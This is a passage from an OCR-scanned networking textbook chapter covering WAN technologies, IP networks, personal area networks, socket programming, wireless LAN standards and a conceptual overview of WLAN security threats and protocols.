layer standard over fiber optics for carrying voice, 
data, and video. 

Table 29.2 gives a comparison of all the technologies as dis- 
cussed above for WANs. 


TABLE 29.2 

Comparison of Technologies for WAN 

Technology 

Speed 

Characteristics 

Switched 

56 Kbps 

Switched line, not dedicated 

X.25 

64 Kbps 

Packet switching, error correction, store 
and forward, with round trip delay 

Frame Relay 

56 Kbps to 1.544 Mbps 

Varying length frames with PVC 

SMDS 

1.533-45 Mbps 

Fixed cell length with no error checking 

T1 

1.544 Mbps 

24 Multiplexed channels 

T3 

44.736 Mbps 

672 Multiplexed channels 

SONET 

51.8Mbps (OC-1) 

OC2 is 2X OC1, OC3 is 3X OC1 

ATM 

155-622 Mbps 

Fixed length packets and works on 
SONET and T carrier lines. Uses VCs 


© 2012 by Bela Liptak 



476 Networks, Security, and Protection 


Transmission rates usually range from 1200 bps to 
6 Mbps, although some connections such as ATM and Leased 
lines can reach speeds greater than 156 Mbps. Typical com- 
munication links used in WANs are telephone lines, micro- 
wave links, and satellite channels. 

INTERNET PROTOCOL NETWORKS 

The Internet , using the IP, has become by far the most ubiq- 
uitous WAN in the world. Internet users are able to transmit 
video clips, e-mail, telephone calls (called Voice Over IP), to 
digitized x-rays over the Internet. Computer networks include 
individual segments of network cable. The electrical proper- 
ties of cabling limit the useful size of any given segment such 
that even a modestly sized local-area network will require 
several of them. Gateway devices like routers and bridges 
connect these segments together although not in a perfectly 
seamless way. 

Variations of IP Networks 

There are three basic variations of IP networks. First is the 
overall Internet itself which encompasses all personal and 
business users of the Internet. The second type of IP-based 
networks is intranets. An Intranet is usually deployed within 
a specific organization or company. A company intranet may 
be used to manage human resources and financial processes 
and keep employees updated on company news. The third 
type of IP-based networks is Extranets. Typically, extranets 
are used to link multiple organizations or companies for 
some common business purpose. In both intranets and 
extranets, a technology known as a firewall is employed to 
prevent unauthorized access to the network or unauthorized 
Uniform Resources Locator (URL) from the network. The 
URL is the basic unique address or location for any website 
or other Internet service. 

The following configuration (Figure 29.10) shows all the 
elements of WAN. In this model, LANs are connected to a 
router thus connecting the hosts to the router. In some cases 
a host can be connected directly to a router. The collection 
of communication lines and routers (but not the hosts) form 
the subnet. 

Wide-area networks also operate over a variety of wire- 
less media. Wireless media can support either fixed or mobile 


■S obue*- TV-Utgr 




□ nrU— 

V9 9 9^ 


LAN 


FIG. 29.10 

Elements of WAN. 


applications. Another common distinction in wireless net- 
works is whether it is point-to-point or point-to-multipoint. In 
point-to-point the originating transmission has one receiver, 
whereas in point-to-multipoint the originating transmission 
has multiple receivers. Examples of wireless media include 
radio wave, microwave, cellular, and satellite. 

PERSONAL AREA NETWORK 

The concept of a PAN first was developed by Thomas 
Zimmerman and other researchers at MIT’s Media Lab 
and later supported by IBM’s Almaden Research Lab. It is 
defined as a computer network that is used for communica- 
tion among computer devices such as mobile computer, cell 
phones, and handheld computing devices such as PDAs, lap- 
tops, PCs, printers, video game consoles, and also for con- 
necting to other networks including Internet. One device is 
selected to assume the role of the controller during wireless 
PAN initialization, and this controller device mediates com- 
munication within the WPAN. The controller broadcasts a 
beacon that lets all devices synchronize with each other and 
allocates time slots for the devices. Some of the materials 
have been derived from Refs. [8,9]. 

The 802.15 working group is defining different versions 
for devices that have different requirements. IEEE 802.15.3 
focuses on high-bandwidth of about 55 Mbit/s, low-power 
MAC and physical layers, while 802.15.4 deals with low- 
bandwidth of about 250 Kbit/s, extra-low power MAC and 
physical layers. 802.15 aims to secure wireless PANs. 

CLIENT-SERVER MODEL AND SOCKET PROGRAMMING 

As mentioned above in the OSI model, the services of a 
layer are available to higher layers through the SAP which 
is also known as port or socket. Further, all the protocols 
and applications are built around the client-server model. 
Due to a tremendous push for world-wide competition in 
the recent years, financial and economic sectors are gearing 
toward globalization for balancing the traditional centralized 
corporate control. This trend has forced the business com- 
munity to adopt new techniques for increasing productivity 
at lower operating costs. A new concept of re-engineering 
has emerged that encourages the corporate-wide work-flow 
processes to be redesigned instead of simply automating the 
processes within their organizations. Emerging technologies 
are being used to fulfill the performance and productivity 
targets of corporate re-engineering. 

Large corporations usually make the decisions for 
any future expansion or strategy for the future based on 
data stored in a central databases or files residing on main 
frames or mini-computers. The off loading of processing 
and manipulation of data from these expensive minicomput- 
ers and main frames should be done over cheaper worksta- 
tions and offer access to the host machine. This can easily be 


© 2012 by Bela Liptak 


29 Computer Networks: LANs, MANs, WANs, and Wireless All 


implemented using the client-server computing paradigm/ 
framework/ model . 

A client is an application program that runs using local 
computing resources, and at the same time, can make a 
request for a database or other network services from another 
remote application residing on a server which has another 
program running on it. The software offering interaction 
between clients and servers is usually termed as middleware. 
The client resides on a PC or laptop or any other comput- 
ing device via a network to more powerful PCs, worksta- 
tions, even mainframe or minicomputers usually known as 
servers. These are capable of handling requests from more 
than one client simultaneously. The model supports a num- 
ber of client-server models and operating systems, various 
Graphical User Interface (GUI) tools, standard GUI tools, 
toolkits customizing user interfaces, and many others. The 
client and server communicate with each other through the 
SAP or ports or sockets. The following section will describe 
in brief the concept of socket, and socket programming based 
on client-server paradigm. 

Socket 

It can be defined as a network SAP or port that represents 
an endpoint of a bidirectional inter-process communication 
flow across an IP-based computer network. It accepts and 
forwards incoming data packets of appropriate applica- 
tion process or thread, based on a combination of local and 
remote IP addresses and port numbers. A socket address is 
the combination of an IP address (the location of the com- 
puter) and a port (which is mapped to the application pro- 
gram process) into a single identity. Sockets or ports are used 
in protocols such as a transport protocol (e.g., TCP, UDP), 
raw IP, or others and define a unique address for each of the 
protocols being used, for example, TCP port with 53 and 
UDP port with 53 are different, distinct sockets. The local 
socket address includes IP address and port number. The 
Remote socket address is established TCP sockets for the 
TCP server as it may serve several clients concurrently. The 
server creates one socket for each client, and these sockets 
share the same local socket address. Some of the materials 
presented here have been derived from Refs. [7,10,11], 

Socket types: Based on the applications, the following stan- 
dard Internet sockets are available: 

• Datagram sockets, also known as connectionless 
sockets which use UDP. Each packet sent or received 
on a Datagram socket is individually addressed and 
routed. Multiple packets sent from one node to another 
may arrive in any order and might not arrive at the 
receiving computer at the same time. 

• Stream sockets, also known as connection-ori- 
ented sockets, which use TCP or Stream Control 
Transmission Protocol (SCTP). It provides sequenc- 
ing of the packets, error-control, flow control and 


well-defined mechanisms for creating and destroying 
connections. 

• Raw sockets (or Raw IP sockets), typically available in 
routers and other network equipment. It allows direct 
sending and receiving of network packets by applica- 
tions, bypassing all encapsulation in the networking 
software of the operating system. 

In addition to the standard IP socket there are some non- 
Internet sockets, implemented over other transport protocols, 
such as SNA and Unix Domain Sockets (UDS), for internal 
inter-process communication. 

Socket Implementation Issues 

Sockets are usually implemented as an Application Program 
Interface (API) library such as Berkeley sockets that were 
introduced in 1983. Implementations based on Berkeley sock- 
ets include Winsock introduced in 1991, STREAMS-based 
Transport Layer Interface (TLI) and others. Development of 
application programs using client-server for the network or 
Internet that utilize this API is called socket programming or 
network programming. 

API library offers the following functions or methods 
that can be used for socket implementation: 

• Socket/) creates a new socket of a certain socket type, 
identified by an integer number, and allocates system 
resources to it. 

• bind() is typically used on the server side and associ- 
ates a socket with a socket address structure, i.e., a 
specified local port number and IP address. 

• listen/) is used on the server side and causes a bound 
TCP socket to enter listening state. 

• connect/) is used on the client side and assigns a 
free local port number to a socket. In case of a TCP 
socket, it causes an attempt to establish a new TCP 
connection. 

• accept/ ) is used on the server side. It accepts a received 
incoming attempt to create a new TCP connection 
from the remote client and creates a new socket asso- 
ciated with the socket address pair of this connection. 

• send/) and recvQ, or write/) and read/), or recvfrom/) 
and sendto(), are used for sending and receiving data 
to/from a remote socket. 

• close/) causes the system to release resources allo- 
cated to a socket. In case of TCP, the connection is 
terminated. 

• gethostbynameQ and gethostbyaddr/) are used to 
resolve host names and addresses. 

• select/) is used to prune a provided list of sockets for 
those that are ready to read, ready to write, or have 
errors. 

• poll/) is used to check on the state of a socket. The 
socket can be tested to see if can be written to, read 
from, or has errors. 


© 2012 by Bela Liptak 



478 Networks, Security, and Protection 


Client-Server Implementation Using Socket 

The following is the sequence of steps needed to create a socket 

for any applications (e.g., e-mail, ftp, remote access, etc.). 

• An application process providing service on a server, 
creates socket on start up and configures it in listening 
state. 

• The socket waits for initiatives from client programs 
process. For a listening TCP socket, the remote 
address presented by netstat may be denoted 0 . 0 . 0. 0 
and the remote port number 0 . 

• A TCP server may serve several clients concurrently, 
by creating a child process for each client and estab- 
lishing a TCP connection between the child process 
and the client. 

• Unique dedicated sockets are created for each con- 
nection. These are in established state, when a socket- 
to-socket virtual connection or virtual circuit (VC), 
also known as a TCP session, is established with the 
remote socket, providing a duplex byte stream. 

• Other possible TCP socket states presented by the net- 
stat command are Syn-sent, Syn-recv, Fin-waitl, Fin- 
wait2, Time-wait, Close-wait and Closed which relate 
to various start up and shutdown steps. 

• A server may create several concurrently established 
TCP sockets with the same local port number and 
local IP address, each mapped to its own server-child 
process, serving its own client process. They are 
treated as different sockets by the operating system, 
since the remote socket address (the client IP address 
and/or port number) are different, that is, since they 
have different socket pair tuples. 

• A UDP socket cannot be in an established state, since 
UDP is connectionless. Therefore, netstat does not 
show the state of a UDP socket. 

• A UDP server does not create new child processes for 
every concurrently served client, but the same process 
handles incoming data packets from all remote clients 
sequentially through the same socket. This implies 
that UDP sockets are not identified by the remote 
address, but only by the local address, although each 
message has an associated remote address. 

• Interconnecting devices like routers and switches typ- 
ically do not use the socket identifiers of the routed 
or switched data. However, stateful network firewalls 
and Network Address Translation proxy servers auto- 
matically keep track of all active socket pairs, UDP as 
well as TCP, based on certain time-out settings. 

• Raw sockets are typically available in network envi- 
ronment and used for routing protocols such as IGMP 
and OSPF, and in ICMP. 

A typical server-client model offers the following pro- 
cesses to be implemented for inter-process communication 

(Figure 29.11). 


WIRELESS NETWORKS AND SECURITY ISSUES 

The first generation of wireless data modems was developed 
in the early 1980s by amateur radio operators and named as 
packet radio. They added a voice band data communication 
modem, with data rates below 9600 bit/s, to an existing short 
distance radio system, typically in the 2 m amateur band. 
The second generation of wireless modems was developed 
immediately after the FCC announcement in the experimen- 
tal bands for non-military use of the spread spectrum tech- 
nology. These modems provided data rates on the order of 
hundreds of kbit/s. The third generation of wireless modem 
then aimed at compatibility with the existing LANs with data 
rates on the order of Mbit/s. Several companies developed the 
third generation products with data rates above 1 Mbit/s and 
a couple of products had already been announced by the time 
of the first IEEE Workshop on Wireless LANs in 1991. 

A Wireless LAN (WLAN) is a wireless LAN that con- 
nects computers or devices using Orthogonal Frequency 
Division Multiplexing (OFDM) technology. In this method, 
multiple signals simultaneously are transmitted over a single 
transmission path, such as a cable or wireless system. Each 
signal travels within its own unique frequency range (car- 
rier), which is modulated by the data (text, voice, video, etc.). 
Some of the materials presented here have been derived from 
Refs. [9,10], 

During the time that wireless LAN products were 
appearing in the market, at the same time IEEE 802.11 
committee started its activities of developing standards for 
wireless LANs. This technology was well received with a 
number of applications being developed and by 1996 many 
chip sets for LAN implementation were introduced in the 
market. This technology of Wireless LAN found its applica- 
tions in hospitals, stock exchanges, and many other campus 
buildings for nomadic access, point-to-point LAN bridges, 
Ad hoc networks and also for internetworking. During the 
same time wireless LAN interoperability forum within 
IEEE 802.11 and European Hiper LAN specification worked 
toward Wireless LAN standards and the Unlicensed Personal 
Communications Services proposed a new standard as 
SUPERNet which was named as U-NII bands at a later time. 

Components of Wireless Networks 

Wireless host: It is the end-system device that runs applica- 
tions. It may be a laptop, palmtop, PDA, cell phone, desk 
computer, or other computing device. The hosts may not nec- 
essarily be mobile. 

Wireless link: Hosts communicate with each other through 
a wireless communication link. Different types of wireless 
link technologies with different rates have been introduced. 

Base station: The station that is responsible for sending and 
receiving the data packet to and from wireless host that is 
associated with the base station. The association of host with 


© 2012 by Bela Liptak 


29 Computer Networks: LANs, MANs, WANs, and Wireless 479 


Server 



Open communication end point 


Register well-known address 
with the system 


Establish clients connection 
requests queue size 


Accept first client connection 
request on the queue 


Open communication end point 


Set up connection to server 


Send/receive data 


Send/receive data 


Shut down 


FIG. 29.11 

Inter-process communications in client-server model. 

a base station means that host is within the wireless com- 
munication distance of base station, for example, cell towers 
in cellular networks and access point in 802.11 wireless net- 
works. The hosts or cells are allocated a band of frequencies 
and are attached to base station. The base station consists of a 
transmitter, a receiver, and a control circuit unit. The interfer- 
ence and cross talk do not exist as each of the adjacent cell 
or host is assigned different frequencies. In some situations 
where the cells and hosts are located significant distances 
apart, the same frequency may be used. 

Advantages and Disadvantages of WLANs 

The Wireless LANs have been adopted due to their conve- 
nience, cost efficiency, and ease of integration with other 


networks and network components. The majority of com- 
puter manufacturers include necessary wireless LAN tech- 
nology into their products. The following is a brief discussion 
on some of the advantages and disadvantages of WLAN. 
Some of the materials presented here are being derived from 
Refs. [2,4,6], 

Advantages 

1 . Convenience 

2. Mobility 

3. Deployment 

4. Expandability 

5. Low cost 


© 2012 by Bela Liptak 















480 Networks , Security, and Protection 


Disadvantages 

1. Security 

2. Limited range 

3. Poor reliability 

4. Speed 

5. Radio emissions 

Configurations in Wireless LANs 

WLANs can be configured in a variety of ways, which is 
based on applications, available hardware devices and proto- 
cols, and so on. Peer-to-peer and client-server configurations 
are popular in WLAs. 

Peer-to-peer (P2P) network or ad hoc network: provides 
communication between two wireless devices connected 
such that both nodes can start communication based on 
Independent Basic Service Set (IBSS). All the nodes can 
make a request and provide the services. Wireless devices 
within range of each other can discover and communicate 
directly without involving central access points. This method 
is typically used by two computers so that they can connect 
to each other to form a network. IEEE 802.11 specification 
documents define the physical layer (PHY) and MAC lay- 
ers, and it includes three standards for PHY: diffuse infrared 
operating at 1 Mbit/s in; frequency-hopping spread spectrum 
operating at 1 or 2 Mbit/s; and direct-sequence spread spec- 
trum operating at 1 or 2 Mbit/s. 

Client-server: framework has been widely used in imple- 
menting all Internet applications; it also finds its applica- 
tion in wireless LANs. In this configuration, client makes a 
request to a server and server provides the services to cli- 
ent. The client-server offers advantages such as a centralized 
management, strong security, expansion, and create redun- 
dant systems. Client servers use user level security. Admin 
gives rights before anyone can access PC. It also suffers from 
certain disadvantages such as expensive, difficult to imple- 
ment, and central point of failure. It offers a number of ser- 
vices via different servers such as: 

File server: The file server offers services that allow users 
to share files and includes storing, retrieving, and moving 
data. 

Print server: The print server controls the queue or spooler, 
which hold jobs till ready. 

Application server: The application server allows a client to 
access and use extra computing power and extensive software 
applications that reside on a shared computer. SQL backend 
does all the processing. 

Other servers: The other servers are Database, Proxy 
Servers, Mail, FTP, DNS, DHCP, RAS, web, Directory, and 
Newsgroup. 


WLAN Standardization 

To support communication over a wireless medium, the 
wireless interface of a client or access point contains a radio 
and an antenna. To avoid interference and allow networks to 
operate in the same locations, IEEE 802.11 specifies groups 
of frequencies that may be utilized by a network. Two groups 
are in the radio frequency band and one in the infrared band 
of the electromagnetic spectrum. The radio frequencies 
available to Wi-Fi are in the 2.4 GHz Industrial, Scientific, 
and Medical (ISM) band and the 5 GHz Unlicensed National 
Information Structure (U-NII) band. Depending on regula- 
tory authorities, the range used by IEEE 802.11b and 802. llg 
is 2.402-2.495 GHz, and 5.12-5.25, 5.25-5.35, and 5.725- 
5.875 GHz for IEEE 802.11a. Some of the materials presented 
here have been derived from Refs. [3,4,13— 15 ]. 

Reference [13] refers to Financial Services — Information 
Sharing and Analysis Center (FS-ISAC) that was established 
in 1999 by the financial services sector in response to 1998’s 
Presidential Directive 63. That directive — later updated by 
2003’s Homeland Security Presidential Directive 7 — man- 
dated that the public and private sectors share information 
about physical and cyber security threats and vulnerabilities 
to help protect the U.S. critical infrastructure. 

Reference [14] refers to the National Communications 
System (NCS) that began in 1962 after the Cuban missile cri- 
sis when communication problems among the United States, 
the Union of Soviet Socialist Republics, the North Atlantic 
Treaty Organization, and foreign heads of state threatened to 
complicate the crisis further. 

Reference [15] refers to the establishment of Electricity 
Sector — Information Sharing and Analysis Center (ES-ISAC) 
that serves the electricity sector by facilitating communica- 
tions between electricity sector participants, federal govern- 
ments, and other critical infrastructures. 

The IEEE 802.11 standard divides the 2.4 GHz band 
into 14 channels, but only 3 non-overlapping channels. The 
5 GHz band on the other hand is divided into 12 non-overlap- 
ping channels. A Wi-Fi network may operate in all of these 
channels, but a single wireless interface may only operate 
in 1 channel. The data rate of a channel can be dynamically 
adjusted depending on the quality of the channel. The initial 
version of 802.11 supported data rates up to 1 and 2 Mbps, 
later 11 Mbps (IEEE 802.11b) and up to 54Mbps (IEEE 
802.11a and 802. llg). Some Wi-Fi equipment support data 
rates up to 108 Mbps by utilizing several channels at the 
same time (Super G and Turbo G). 

Standard Protocol for Wireless LANs 

IEEE 802.11 defines only on MAC which is based on Carrier 
Sense Multiple Access with Collision Avoidance (CSMA/ 
CA). The specification also includes methods designed to 
minimize collisions. There may be a situation where two 
mobile nodes may be in the range of an access point but not 
in range of each other. In order to handle these situations, the 


© 2012 by Bela Liptak 



29 Computer Networks: LANs, MANs, WANs, and Wireless 481 


TABLE 29.3 

IEEE 802.11 Standard Protocols for WLAN 


Protocol 

Release 

Date 

Operating 
Frequency ( GHz) 

Data Rate 
(Typical) (Mbit/s) 

Data Rate 
(Max) (Mbit/s) 

Range ( Indoor ) 

Legacy 

1997 

2.4-2. 5 

i 

2 

-20 m 

802.11a 

1999 

5.15-5.35/5.47- 

5.725/5.725-5.875 

25 

54 

-30m (-100ft) 

802.11b 

1999 

2.4-2. 5 

6.5 

11 

-50 m (-150 ft) 

802.1 lg 

2003 

2.4-2. 5 

11 

54 

-30m (-100ft) 

802.1 In 

2006 (draft) 

2.4 or 5 GHz bands 

200 

540 

-50 m (-160 ft) 


802.11 specifications define two modes of operations: (1) Ad 
hoc mode enables peer-to-peer communication between 
mobile nodes, and (2) Infrastructure mode enables the mobile 
nodes to communicate through an access point that serves as 
a bridge to a wired network infrastructure and is a very com- 
mon wireless LAN application. A bridge connects different 
types of networks and a wireless Ethernet bridge connects 
devices of wired Ethernet network to wireless network. Some 
of the materials presented here have been derived from Refs. 
[4,6,13-15], 

Table 29.3 summarizes all the IEEE 802.11 standard pro- 
tocols for Wireless LANs. 

Wireless Technology Types 

Worldwide Interoperability for Microwave Access (WiMAX): 
It is a new telecommunication technology that provides wire- 
less communication for data via different transmission modes 
like point-to-multipoint, portable and fully mobile internet 
access. It supports upto 10 Mbps broadband speed without 
the need for cables. It is based on IEEE 802.16 standard (also 
known as Broadband Wireless Access). WiMAX Forum was 
created in June 2001 to promote conformity and interoper- 
ability of the standard. The forum describes WiMAX as “a 
standards-based technology enabling the delivery of wireless 
broadband access as an alternative to cable and DSL.” 

Universal Mobile Telecommunication System (UMTS): It 
is a 3G wireless system that delivers high-bandwidth data 
and voice services to mobile users. It evolved from Global 
Systems for Mobile communications (GSM). 

General Packet Radio Service (GPRS): The GPRS core net- 
work is the centralized part of the GPRS system. It offers 
mobility management, session management, and transport 
for IP packets in GSM and WCDMA networks. 

Global System for Mobile Communications (GSM): It works 
on circuit-switched networks. A mobile computer with a spe- 
cial modem can use a GSM telephone to make a call in the 
same way as hardwired telephone. 

Cellular Digital Packet Data ( CDPD ): CDPD uses OSI 
model closely. The physical layer is related with the details 
of modulation and radio transmission. Data link, network. 


and transport protocols are also present but are not used. A 
CDPD system includes three kinds of stations: mobile hosts, 
base stations, and base interface stations. These stations 
communicate with stationary hosts and standard routers of 
the kind found in any WAN. 

Local Multipoint Distribution Service (LMDS): It is a 
fixed broadband line-of-sight, point-to-multipoint, micro- 
wave system, which operates at a high frequency (typically 
within specified bands in the 24-40 GHz range) and can 
deliver at a very high capacity, depending on the associated 
technologies. 

IEEE 802.11: IEEE 802.11, the Wi-Fi standard, denotes a 
set of Wireless LAN/WLAN standards developed by work- 
ing group 11 of the IEEE LAN/MAN Standards Committee 
(IEEE 802). The 802.11 family currently includes six over- 
the-air modulation techniques that all use the same protocol. 
The most popular (and prolific) techniques are those defined 
by the b, a, and g amendments to the original standard. 

SECURITY ISSUES IN WLANs 
Unauthorized Access and Attacks 

The following section describes the available types of unau- 
thorized access and attacks that are common to both wired 
and wireless LANs. 

1. Accidental association: When a user turns on and 
boots up a laptop, a wireless access point from a neigh- 
boring company’s overlapping network may show on 
the laptop without the knowledge of the user. 

2. Malicious association: Attackers are able to con- 
nect their wireless devices to the company’s network 
through their laptop instead of the company’s access 
point. Since wireless networks operate at the Layer 2, 
protection mechanisms such as network authentica- 
tion and VPNs at layer 3 do not offer any security 
measures. In most cases, the attacker is trying to take 
over the client at the Layer 2 level instead of cracking 
various security and authentication measures. 

3. Ad hoc networks: Usually have little protection; 
encryption methods can be used to provide security. 


© 2012 by Bela Liptak 



482 Networks, Security, and Protection 


The Ad hoc network introduces the security problem 
at the bridge layer that it provides to other networks, 
usually in the corporate environment. In most ver- 
sions of Microsoft Windows this feature is turned 
on unless explicitly disabled. Thus the user may not 
even know they have an unsecured Ad hoc network in 
operation on their computer. If they are also using a 
wired or wireless infrastructure network at the same 
time, they are providing a bridge to the secured orga- 
nizational network through the unsecured Ad hoc 
connection. 

4. Non traditional networks: Nontraditional networks 
such as personal networks based on Bluetooth devices 
are not safe from cracking and should be regarded as a 
security risk. Even Barcode readers, handheld PDAs, 
and wireless printers and copiers should be secured. 

5. Identity theft ( MAC spoofing): It occurs when an 
attacker listens to the network traffic on a known port 
and identifies the MAC address of a computer with 
network privileges. Most wireless systems allow some 
kind of filtering to only allow authorized computers 
with specific MAC IDs to gain access and utilize the 
network. However, a number of programs exist that 
have network “sniffing” capabilities. MAC filtering 
is only effective for small residential networks, since 
it only provides protection when the wireless device 
is not connected or inactive. Any 802.11 device con- 
nected or active freely transmits its unencrypted 
MAC address in its 802.11 headers, and it requires 
no special equipment or software to detect it. Anyone 
with an 802.11 receiver (laptop and wireless adapter) 
and a freeware wireless packet analyzer can obtain 
the MAC address of any transmitting 802.11 within 
range. 

6. Man-in-the-middle attacks: An attacker entices com- 
puters to log into a computer which is set up as a 
soft AP (Access Point). Once this is done, the hacker 
connects to a real access point through another wire- 
less card offering a steady flow of traffic through the 
transparent hacking computer to the real network. The 
hacker can then sniff the traffic. 

7. Denial of service m(DoS) occurs when an attacker 
continually bombards a targeted AP or network with 
bogus requests, premature successful connection mes- 
sages, failure messages, and/or other commands. 

8. Network injection: In a network injection attack, 
an attacker can make use of access points that are 
exposed to non-filtered network traffic, specifically 
broadcasting network traffic. The attacker injects 
bogus networking re-configuration commands that 
affect routers, switches, and intelligent hubs. A whole 
network can be brought down in this manner and 
require rebooting or even reprogramming of all intel- 
ligent networking devices. 

9. Caffe Latte attack: The Caffe Latte attack is another 
way to defeat WEP. 


Security Standardization in WLAN 

The issue of security in 802.11 has drawn considerable atten- 
tion from the vendors, users, and developers. The first secu- 
rity proposed standard specification introduced for wireless 
LAN is known as Wired Equivalent Privacy (WEP) which 
provides the same level of security as provided in wired 
LANs. For more details, please refer to Refs. [6,13-15]. 

Wi-Fi depends on cryptographic methods to enable 
security using the WEP and Wi-Fi Protected Access (WPA) 
security mechanisms. 

WEP was the first cryptographic protocol developed for 
Wi-Fi to enable privacy and authentication. WEP, however, 
was not secure after all. To rectify the security issues with 
WEP, the Wi-Fi Alliance pushed a new cryptographic pro- 
tocol, WPA. Since then, a common practice of securing a 
WPA enabled network with passwords has been discovered 
to be vulnerable to an offline dictionary-attack. Even though 
WPA itself is thought to be secure, apart from the dictionary- 
attack, it was a quick fix to the problems in WEP. WPA is a 
subset of a Robust Security Network (RSN) which was intro- 
duced in an early draft of a security standard developed by 
IEEE 802. lli. 

Security protocols for WLAN are listed in the fol- 
lowing. Further discussions on this topic can be found in 
Chapters 30, 31, 33, and in others, and, therefore, will not 
be repeated here. 

• Wired Equivalent Privacy (WEP) 

• Wi-Fi Protected Access version 1 (WPAvl) 

• Wi-Fi Protected Access version 1 (WPAv2) 

• Temporal Key Integrity Protocol (TKIP) 

• Extensible Authentication Protocol (EAP) 

• Lightweight Extensible Authentication Protocol 
(LEAP) 

• Protected Extensible Authentication Protocol (PEAP) 

RF Shielding 

It is practical in some cases to apply specialized wall paint 
and window film to a room or building to significantly atten- 
uate wireless signals, which keeps the signals from propagat- 
ing outside a facility. This can significantly improve wireless 
security because it is difficult for hackers to receive the 
signals beyond the controlled area of an enterprise, such as 
within parking lots. 

References 

1 . J. Kurose and K. Ross, Computer Networking: A Top-Down 
Approach, 5th edn., Addison-Wesley, Reading, MA, 2010. 

2. G. S. Hura and M. Singhal, Data and Computer: Networking 
and Internetworking, CRC Press, Boca Raton, FL, 2001. 

3. http://www.microsoft.com/en-us/security_essentials/default. 
aspx (Januaryl2, 2010). 

4. B. Forouzan, TCP/IP Protocol Suite, 3rd edn., McGraw-Hill, 
New York, 2006. 


© 2012 by Bela Liptak 


29 Computer Networks: LANs, MANs, WANs, and Wireless 483 


5. W. Stallings, Data and Computer Communications, 8th edn., 
Pearson, Prentice Hall, Upper Saddle River, NJ, 2007. 

6. http://www.gfi.com/endpointsecurity/esecpapers.htm/ (May 

20, 2010). 

7. M. Dunn and I. Wigert, The Critical Information Infrastructure 
Prevention (CIIP) Handbook 2004, A. Wenger and J. Metzger 
(eds.), Swiss Federal Institute of Technology, http://www.isn. 
ethz.ch/crn/, 2006 (March 22, 2010). 

8. L. Applegate, E-business models, in Information Technology 
and the Future of the Enterprise, G. Dickson and G. DeSanctis 
(eds.), Prentice Hall, Upper Saddle River, NJ, pp. 49-101 , 2001 . 

9. National Institute of Standards and Technology, Technology 
Administration, U.S. Department of Commerce, An 
Introduction to Computer Security, The NIST Handbook, 
Special Publication, 2006, http://csrc.nist.gov/groups/SMA/ 
fisma/index.html December 22, 2009. 


10. A. Wong and A. Yeung, Network Infrastructure Security, 
Springer Verlag, Berlin, Germany, 2009. 

11. T. Zimmermann, Personal area networks: Near-field intrabody 
communication, MS thesis in Media, Arts and Science, MIT 
Media Lab, 1995 (March 3, 2010). 

12. G. S. Hura, Guest editor of special issue on internet: State-of 
the-art, Computer Communication, 20(16), 1391-1540, 1998. 

13. http://www.fsisac.com/files/FS-ISAC_Overview_2007_ 
04_10.pdf (February 2, 2010). 

14. http://www.ncs.gov/ncc/gov_ind.html (May 21, 2010). 

15. http://www.esisac.com/publicdocs/Guides/SecGuide_ 
PhysResponse_BOTapprvdlNov2005.pdf (January 29, 2010). 


© 2012 by Bela Liptak 


